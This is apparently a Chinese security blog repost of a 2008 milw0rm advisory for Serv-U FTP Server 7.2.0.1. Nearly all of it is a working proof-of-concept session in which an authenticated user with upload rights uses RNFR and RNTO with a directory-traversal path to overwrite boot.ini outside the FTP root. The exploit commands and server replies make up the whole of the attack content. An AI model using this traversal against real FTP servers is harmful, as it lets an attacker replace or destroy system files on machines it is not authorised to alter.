Serv-U 7.2.0.1 Remote FTP File Replacement Vulnerability (auth)

2008/10/03 23:41 | 鬼仔 | 技术文章 | 占个座先

Serv-U 7.2.0.1 Remote FTP File Replacement Vulnerability (auth)
#Serv-U 7.2.0.1 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01

220 Serv-U FTP Server v7.2 ready…
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited

# milw0rm.com [2008-10-03]

Tags: ,

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

发表评论